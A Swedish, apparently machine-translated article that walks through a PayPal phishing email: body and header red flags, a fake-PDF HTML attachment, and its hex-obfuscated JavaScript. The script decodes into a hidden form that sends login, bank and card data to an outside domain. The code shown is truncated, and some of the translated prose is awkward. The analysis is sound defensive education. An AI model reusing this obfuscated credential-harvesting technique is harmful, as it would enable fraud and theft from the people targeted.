Hemsida » hur » Online-säkerhet bryter ner anatomin för en phishing-e-postadress

    Online-säkerhet bryter ner anatomin för en phishing-e-postadress


    I dagens värld där allas information är online är phishing en av de mest populära och förödande attackerna på Internet, eftersom du alltid kan städa ett virus, men om dina bankuppgifter stulits har du problem. Här är en sammanfattning av en sådan attack vi fått.

    Tänk inte att det bara är dina bankuppgifter som är viktiga: trots allt, om någon får kontroll över ditt kontoinloggning, känner de inte bara informationen i det kontot, men oddsen är att samma inloggningsinformation kan användas på olika andra konton. Och om de komprometterar ditt e-postkonto kan de återställa alla dina andra lösenord.

    Så förutom att hålla starka och varierande lösenord måste du alltid vara på utkik efter falska e-postmeddelanden som maskerar som den riktiga saken. Medan de flesta phishing-försök är amatöriska, är vissa ganska övertygande, så det är viktigt att förstå hur man känner igen dem på ytanivå och hur de fungerar under huven.

    Bild av asirap

    Undersöka vad som är i vanlig syn

    Vårt exempel-e-mail, som de flesta phishing-försök, "meddelar" dig om aktivitet på ditt PayPal-konto, vilket normalt skulle vara alarmerande. Så uppmaningen till åtgärd är att verifiera / återställa ditt konto genom att lämna in nästan alla uppgifter du kan tänka dig. Återigen är detta ganska formel.

    Medan det verkligen finns undantag, är nästan alla phishing- och bluff-meddelanden fyllda med röda flaggor direkt i meddelandet själva. Även om texten är övertygande kan du vanligtvis hitta många misstag som strömmar i hela meddelandekroppen vilket tyder på att meddelandet inte är legitimt.

    Meddelandeorganet

    Vid första anblicken är detta en av de bättre phishing-e-postmeddelanden jag har sett. Det finns inga stavnings- eller grammatiska misstag och verbiage läser enligt vad du kan förvänta dig. Det finns dock några röda flaggor som du kan se när du granskar innehållet lite närmare.

    • "Paypal" - Rätt fall är "PayPal" (kapital P). Du kan se att båda varianterna används i meddelandet. Företagen är mycket avsiktliga med sin branding, så det är tveksamt, något sådant skulle passera korrekturprocessen.
    • "Tillåta ActiveX" - Hur många gånger har du sett en legitbaserad verksamhet, storleken på Paypal använder en egen komponent som bara fungerar i en enda webbläsare, speciellt när de stöder flera webbläsare? Visst, någonstans där ute gör något företag, men det här är en röd flagga.
    • "Säkert." - Lägg märke till hur detta ord inte stämmer i marginalen med resten av stycktexten. Även om jag sträcker fönstret lite mer, vrider det inte eller rymmer rätt.
    • "Paypal!" - Utrymmet före utropstecknet ser pinsamt ut. Bara en annan quirk som jag är säker på skulle inte vara i ett legitimt e-postmeddelande.
    • "PayPal-kontouppdateringsformulär.pdf.htm" - Varför skulle Paypal bifoga en "PDF", särskilt när de bara kunde länka till en sida på deras webbplats? Dessutom skulle varför de skulle försöka dölja en HTML-fil som PDF? Detta är den största röda flaggan av dem alla.

    Meddelandehuvudet

    När du tittar på meddelandehuvudet visas ett par fler röda flaggor:

    • Från adressen är [email protected].
    • Adressen saknas. Jag har inte blankat ut det här, det är helt enkelt inte en del av standardmeddelandehuvudet. Vanligtvis kommer ett företag som har ditt namn att personifiera e-postmeddelandet till dig.

    Bilagan

    När jag öppnar bilagan kan du omedelbart se att layouten inte är korrekt eftersom det saknas stilinformation. Återigen, varför skulle PayPal e-posta ett HTML-formulär när de helt enkelt kunde ge dig en länk på deras webbplats?

    Notera: Vi använde den inbyggda HTML-bilagan för Gmail för det här, men vi rekommenderar att du inte öppnar bilagor från scammers. Aldrig. Någonsin. De innehåller ofta exploater som installerar trojaner på din dator för att stjäla din kontoinformation.

    Om du rullar lite mer så kan du se att det här formuläret inte bara gäller vår PayPal-inloggningsinformation, utan också för bank- och kreditkortsinformation. Några av bilderna är trasiga.

    Det är uppenbart att detta phishing-försök går efter allt med ett slag.

    Den tekniska uppdelningen

    Även om det borde vara ganska klart baserat på vad som är klart att detta är ett phishing-försök, kommer vi nu att bryta ner den tekniska sminken i e-postmeddelandet och se vad vi kan hitta.

    Information från bilagan

    Det första du tittar på är HTML-källan till bifogningsformuläret, vilket är vad som skickar data till den falska webbplatsen.

    När du snabbt tittar på källan är alla länkar giltiga eftersom de pekar på antingen "paypal.com" eller "paypalobjects.com" som båda är legitiska.

    Nu ska vi ta en titt på någon grundläggande sidinformation som Firefox samlar på sidan.

    Som du kan se, dras en del av grafiken från domänerna "blessedtobe.com", "goodhealthpharmacy.com" och "pic-upload.de" istället för de legitala PayPal-domänerna.

    Information från e-postrubrikerna

    Nästa tittar vi på de raka e-postmeddelandena. Gmail gör det tillgängligt via menyalternativet Visa original på meddelandet.

    Om du tittar på rubrikinformationen för det ursprungliga meddelandet kan du se att det här meddelandet komponerades med hjälp av Outlook Express 6. Jag tvivlar på att PayPal har någon på personalen som skickar var och en av dessa meddelanden manuellt via en föråldrad e-postklient.

    När vi nu tittar på rutningsinformationen kan vi se IP-adressen till både avsändaren och relaying-mailservern.

    IP-adressen "User" är den ursprungliga avsändaren. Genom att snabbt titta på IP-informationen kan vi se att den sändande IP-adressen är i Tyskland.

    Och när vi ser på relaying-postserverns (mail.itak.at), kan IP-adressen vi ser här vara en ISP baserad i Österrike. Jag tvivlar på att PayPal reder sina e-postmeddelanden direkt via en Österrike-baserad Internetleverantör när de har en massiv servergård som lätt kan hantera denna uppgift.

    Var går data?

    Så vi har klart bestämt att detta är ett phishing-e-postmeddelande och samlat in en del information om var meddelandet härrörde från, men hur är det med var din data skickas?

    För att se detta måste vi först spara HTM-bilagan göra vårt skrivbord och öppna det i en textredigerare. Bläddra igenom det, allt verkar vara i ordning, utom när vi kommer till ett misstänkt ser Javascript-block.

    Att bryta ut hela källan till det sista blocket av Javascript ser vi:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i

    När som helst ser du en stor jumbled sträng av till synes slumpmässiga bokstäver och siffror inbäddade i ett Javascript-block, är det vanligtvis något misstänkt. Ser man på koden ställs variabeln "x" till den här stora strängen och avkodas sedan till variabeln "y". Slutresultatet av variabel "y" skrivs sedan till dokumentet som HTML.

    Eftersom den stora strängen är gjord av siffrorna 0-9 och bokstäverna a-f, är den sannolikt kodad via en enkel ASCII till Hex-omvandling:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Översätter till:

    Det är inte en slump att detta avkodas till en giltig HTML-formtagare som skickar resultaten inte till PayPal, utan till en skurkplats.

    När du även ser HTML-källan till formuläret ser du att den här formtaggen inte är synlig eftersom den genereras dynamiskt via Javascript. Det här är ett smart sätt att dölja vad HTML verkligen gör om någon bara skulle se den genererade källan till bilagan (som vi gjorde tidigare) i motsats till att bilagan öppnades direkt i en textredigerare.

    Att köra en snabb whois på den förekommande webbplatsen, vi kan se här är en domän värd på en populär webb värd, 1and1.

    Det som står ut är att domänen använder ett läsbart namn (i motsats till något som "dfh3sjhskjhw.net") och domänen har registrerats i 4 år. På grund av detta tror jag att den här domänen kapades och användes som en bonde i det här phishing-försöket.

    Cynicism är ett gott försvar

    När det gäller att vara säker på nätet gör det aldrig ont för att ha en bra bit av cynicism.

    Medan jag är säker på att det finns fler röda flaggor i exemplet e-post, är det vi påpekade ovan indikatorer som vi såg efter några få minuter av undersökningen. Hypotetiskt, om e-postens ytnivå efterliknade sin legitima motsvarighet 100%, skulle den tekniska analysen fortfarande avslöja sin sanna natur. Det är därför som det importeras för att kunna undersöka både vad du kan och inte kan se.